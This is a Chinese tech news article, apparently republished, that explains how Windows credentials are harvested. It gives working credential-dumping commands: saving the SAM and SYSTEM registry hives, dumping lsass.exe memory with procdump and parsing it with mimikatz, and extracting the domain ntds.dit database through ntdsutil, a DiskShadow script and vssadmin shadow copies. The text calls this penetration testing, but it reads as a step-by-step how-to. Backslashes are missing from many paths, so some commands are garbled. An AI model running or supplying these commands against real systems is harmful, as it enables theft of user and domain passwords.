江苏龙网

  1. 首页 > 资讯 > 科技 > >

|黑客攻击中最常见的“用户凭证”,到底是什么?


我们都知道 , 就用户隐私泄露风险而言 , 网络钓鱼是最大的威胁 , 其次是键盘记录器 , 然后是第三方黑客方式 。
而黑客攻击是用户凭证泄露最常见的方式 , 但是由于暴露额外信息 , 网络钓鱼诈骗更加危险 。
今天安仔就跟大家聊一聊Windows如何获取用户凭证 , 这里说的用户凭证获取 , 一般是指 ntlm hash 或者可以直接利用的明文密码 。 其他加密方式的用户凭证不在本次讨论范围内 。
1、本地用户凭证
a、通过SAM文件破解
reg save hklmsam C:sam.hive reg save hklmsystem C:system.hiveb、获取lsass内存
1.procdump
procdump是微软提供的一款监测cpu峰值协助管理员检测异常数据的软件是合法可信任软件因此杀软不会拦截 。
利用该软件可读取内存的特性可以将计算机用户登录内存抓取出来 。 具体命令如下
以管理员身份启动cmd procdump64.exe -accepteula -ma lsass.exe 存放路径文件名将生成的文件传出后使用mimikatz破解
mimikatz # sekurlsa::minidump 文件名 mimikatz # sekurlsa::logonPasswords full2.创建转储文件
除了使用工具软件获得 lsass.exe 的内存外还可以直接在任务管理器中创建 lsass.exe 的转储文件效果和 procdump 生成的效果一样 。
|黑客攻击中最常见的“用户凭证”,到底是什么?
本文插图

2、域用户凭证
a、ntdsutil 域快照
ntdsutil 是一个命令行工具是域控制器生态系统的一部分其主要用途是使管理员能够轻松访问和管理 Windows Active Directory 数据库 。 但它常被渗透测试人员或红队队员滥用来获取现有的 ntds.dit 文件快照 。 在 Windows Server 2008 及以上版本的系统中可直接使用 ntdsutil 。
ntdsutil activate instance ntds ifm create full C:ntdsutil quit quit
|黑客攻击中最常见的“用户凭证”,到底是什么?
本文插图

b、DiskShadow
DiskShadow 是一个 Microsoft 签名二进制文件用于协助管理员执行与卷影复制服务VSS相关的操作 。 这个二进制文件有两个模式 interactive 和 script 脚本将包含自动执行 NTDS.DIT 提取过程所需的所有命令 。 可以在脚本文件中添加以下行以创建新的 volume shadow copy卷影复制挂载新驱动执行复制命令以及删除 volume shadow copy 。
set context persistent nowriters add volume c: alias someAlias create expose %someAlias% z: exec ''cmd.exe'' /c copy z:windowsntdsntds.dit c:ntdsntds.dit delete shadows volume %someAlias% reset需要注意的是DiskShadow二进制文件需要从C:WindowsSystem32路径执行 。 如果从其它路径调用它脚本将无法正确执行同时该脚本文件保存时编码格式不能选择 UTF-8 要选择 ASCII 编码否则运行会报错 。
diskshadow.exe /s c:diskshadow.txt
|黑客攻击中最常见的“用户凭证”,到底是什么?
本文插图

SYSTEM注册表hive也应该被复制因为其包含了解密NTDS文件内容所需的密钥 。
reg.exe save hklmsystem c:ntdssystem.bakc、vssadmin
vssadmin 即卷影复制服务Volume Shadow Copy Service是微软Windows的一项组件服务从Windows XP开始支持 。 管理员可以使用卷影复制服务备份计算机卷以及文件即使操作系统正在使用这些资源 。
1.备份方法
vssadmin create shadow /for=C: copy ?GLOBALROOTDeviceHarddiskVolumeShadowCopy[ID]windowsntdsntds.dit copy ? GLOBALROOTDeviceHarddiskVolumeShadowCopy[ID]windowssystem32configSYSTEM vssadmin delete shadows /shadow=[GUID]其中的HarddiskVolumeShadowCopy[ID]中的[ID]和[GUID]均为动态生成需要根据回显结果输入 。 如下图:


推荐阅读


上一篇:右手网|三星即将推出新款固态硬盘,最高容量将达到 8TB

下一篇:微博|微博发布新规:今日22时起,发布评论须关注博主7天以上